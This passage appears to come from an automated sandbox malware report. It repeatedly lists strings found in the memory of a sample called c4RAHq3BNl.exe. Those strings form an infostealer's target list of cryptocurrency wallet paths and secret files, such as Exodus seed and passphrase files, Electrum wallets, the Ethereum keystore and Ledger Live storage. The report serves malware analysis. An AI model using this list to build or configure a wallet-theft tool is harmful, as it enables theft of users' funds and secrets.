Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: c4RAHq3BNl.exe, 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: ite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: c4RAHq3BNl.exe, 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: ite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: c4RAHq3BNl.exe, 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: ite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: c4RAHq3BNl.exe, 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: ite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: c4RAHq3BNl.exe, 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: ite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: c4RAHq3BNl.exe, 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: ite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: c4RAHq3BNl.exe, 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: ite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: c4RAHq3BNl.exe, 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: ite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: c4RAHq3BNl.exe, 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: ite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: c4RAHq3BNl.exe, 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: ite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: c4RAHq3BNl.exe, 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: ite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: c4RAHq3BNl.exe, 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: ite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
